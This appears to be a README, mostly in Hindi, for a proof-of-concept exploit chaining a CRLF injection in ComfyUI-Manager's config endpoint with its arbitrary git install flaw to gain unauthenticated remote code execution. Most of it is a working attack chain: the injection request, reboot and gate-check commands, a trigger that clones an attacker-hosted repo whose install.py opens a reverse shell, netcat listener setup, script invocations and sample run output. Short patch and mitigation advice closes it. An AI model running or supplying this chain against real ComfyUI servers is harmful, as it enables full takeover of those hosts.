
ComfyUI-Manager के config endpoint में CRLF injection को arbitrary git install के साथ chain करके unauthenticated remote code execution प्राप्त करने का proof-of-concept exploit।
गंभीरता: क्रिटिकल (CVSS 9.8) प्रभावित: ComfyUI-Manager < 3.39.2 और 4.0.0 - 4.0.4 पैच किया गया: ComfyUI-Manager 3.39.2 / 4.0.5 में श्रृंखलाबद्ध: CVE-2025-67303 (मनमाना Git इंस्टॉल -> कोड एक्ज़ीक्यूशन)
ComfyUI-Manager एक /api/manager/db_mode एंडपॉइंट प्रदान करता है जो एक value क्वेरी पैरामीटर स्वीकार करता है और इसे Python के configparser का उपयोग करके सीधे config.ini में लिखता है।
यह भेद्यता एक बेयर कैरिज-रिटर्न इंजेक्शन (\r / %0D) है:
configparser मान को वैसे ही सीरियलाइज़ करता है — \r फ़ाइल में जैसा है वैसा ही संग्रहीत होता है।\r को लाइन टर्मिनेटर मानता है, जिससे एक मान दो अलग INI निर्देशों में विभाजित हो जाता है।strict=False (ComfyUI-Manager का डिफ़ॉल्ट) के साथ configparser डुप्लिकेट कीज़ स्वीकार करता है और अंतिम वाली का उपयोग करता है। इंजेक्ट किया गया security_level = weak वैध मान को ओवरराइट कर देता है।रीबूट के बाद जाली सेटिंग प्रभावी हो जाती है, जिससे /api/customnode/install/git_url (CVE-2025-67303) पर प्रमाणीकरण गेट अक्षम हो जाता है। वह एंडपॉइंट एक मनमाना git रिपॉज़िटरी क्लोन करता है और तुरंत उससे install.py को सबप्रोसेस के रूप में निष्पादित करता है — जिससे एक अनप्रमाणित हमलावर को पूर्ण कोड एक्ज़ीक्यूशन मिल जाता है।
Step 1 — Inject bare CR into config endpoint
GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak
config.ini on disk after write:
db_mode = cache\r
security_level = weak <- injected via %0D
Step 2 — Reboot Manager to reload forged config
GET /api/manager/reboot
Manager reads config.ini back; universal newlines split the value;
last-key-wins -> security_level = weak
Step 3 — Verify gate (poll until 403 changes to 400)
POST /api/customnode/install/git_url body: http://127.0.0.1/probe.git
403 = gate still closed
400 = gate open, security_level=weak confirmed
Step 4 — Trigger install from evil git repo (CVE-2025-67303)
POST /api/customnode/install/git_url
body: http://ATTACKER:9099/alg-upscaler.git
Manager does:
git clone http://ATTACKER:9099/alg-upscaler.git
python install.py <- reverse shell executes here
| फ़ाइल | उद्देश्य |
|---|---|
setup_evil_repo.sh | दुर्भावनापूर्ण git रिपॉज़िटरी बनाएँ और उसे HTTP पर सर्व करें |
exploit_ad15.sh | पूरी श्रृंखला चलाएँ: CRLF इंजेक्ट -> रीबूट -> सत्यापन -> ट्रिगर |
autopwn.py | Python ऑल-इन-वन विकल्प (रिपॉज़िटरी बनाता है + पूरी श्रृंखला चलाता है) |
चरण 1 — संस्करण फ़िंगरप्रिंट
curl -s http://TARGET:8188/api/manager/version
# Vulnerable: "3.39.1" / "4.0.3"
# Patched: "3.39.2" / "4.0.5"
चरण 2 — पुष्टि करें कि CRLF एंडपॉइंट मान स्वीकार करता है
curl -v "http://TARGET:8188/api/manager/db_mode?value=test" 2>&1 | grep "< HTTP"
# HTTP/1.1 200 -> endpoint exists and is writable
चरण 3 — इंस्टॉल गेट की जाँच करें
curl -s -o /dev/null -w "%{http_code}" \
-X POST http://TARGET:8188/api/customnode/install/git_url \
-d "http://127.0.0.1/probe.git"
# 403 -> gate closed (default config, target is injectable)
# 400 -> gate already open (skip Phase 1)
============================================================
CVE-2026-22777 + CVE-2025-67303 Full Chain
============================================================
Target : http://192.168.1.10:8188
Attacker : 10.10.14.1:4444
Evil repo : http://10.10.14.1:9099/alg-upscaler.git
[*] Phase 0: Version fingerprint
ComfyUI-Manager version: "3.39.1" <- vulnerable
[*] Phase 1: CRLF inject -> security_level = weak
[+] Injection sent (HTTP 200)
config.ini now contains:
db_mode = cache\r
security_level = weak <- injected via bare CR
[*] Phase 2: Trigger reboot
[+] Reboot request sent -- waiting 30s for Manager to restart...
[*] Phase 3: Verify security gate
Attempt 1: HTTP 403 <- still rebooting
Attempt 2: HTTP 403
Attempt 3: HTTP 400 <- gate open
[+] Gate OPEN -- security_level=weak is active
[*] Phase 4: Checking evil git repo is reachable
[+] Evil repo reachable (HTTP 200)
[*] Phase 5: Triggering git install (CVE-2025-67303)
ComfyUI-Manager will:
1. git clone http://10.10.14.1:9099/alg-upscaler.git
2. cd into cloned dir
3. python install.py <- reverse shell executes here
चरण 5 में curl हैंग हो जाता है — रिवर्स शेल nc -lvnp 4444 पर आता है।
| Vulhub PoC | यह PoC | |
|---|---|---|
install.py | touch /tmp/success (केवल निष्पादन का प्रमाण) | हमलावर को वापस Python रिवर्स शेल |
| परिणाम | कोई इंटरैक्टिव शेल नहीं | पूर्ण इंटरैक्टिव शेल |
| Vulhub PoC | यह PoC | |
|---|---|---|
| भाषा | एकल Python फ़ाइल | Bash, 2 अलग स्क्रिप्ट |
| क्लीनअप | tempfile.TemporaryDirectory (Ctrl+C पर स्वतः हटा दिया जाता है) | मैनुअल (डिस्क पर रहता है) |
| रिपॉज़िटरी नाम | यादृच्छिक (जैसे evil-node-a1b2c3) | निश्चित: alg-upscaler |
| Vulhub PoC | यह PoC | |
|---|---|---|
| CVE-2026-22777 (CRLF इंजेक्ट) | शामिल नहीं | exploit_ad15.sh चरण 1 में |
| रीबूट + गेट सत्यापन | शामिल नहीं | 30s प्रतीक्षा करता है फिर 403->400 पोल करता है |
| इंस्टॉल ट्रिगर करें | मैनुअल curl | चरण 5 में स्वचालित |
चरण 1 — दुर्भावनापूर्ण रिपॉज़िटरी और लिसनर सेट करें (दो टर्मिनल)
# Terminal 1 — listener
nc -lvnp 4444
# Terminal 2 — build and serve evil repo
bash setup_evil_repo.sh 10.10.14.1 4444
चरण 2 — पूरी एक्सप्लॉइट श्रृंखला चलाएँ
# Terminal 3
bash exploit_ad15.sh 192.168.1.10 10.10.14.1 4444
चरण 5 के बाद टर्मिनल 1 में शेल आ जाता है।
विकल्प — Python ऑल-इन-वन
# Blind command
python3 autopwn.py http://192.168.1.10:8188 --command "id"
# Reverse shell
python3 autopwn.py http://192.168.1.10:8188 --revshell --lhost 10.10.14.1 --lport 4444
अपग्रेड (अनुशंसित): ComfyUI-Manager 3.39.2 या 4.0.5+।
पैच किसी भी क्वेरी पैरामीटर को config.ini में लिखने से पहले \r और \n को हटा देता है।
नेटवर्क शमन (यदि पैचिंग तत्काल नहीं है):
8188 तक बाहरी पहुँच अवरुद्ध करें — ComfyUI सार्वजनिक एक्सपोज़र के लिए डिज़ाइन नहीं किया गया है।/api/manager/* और /api/customnode/* के सामने प्रमाणीकरण के साथ रिवर्स-प्रॉक्सी लगाएँ।config.ini को रीड-ओनली बनाएँ: chmod 444 config.ini।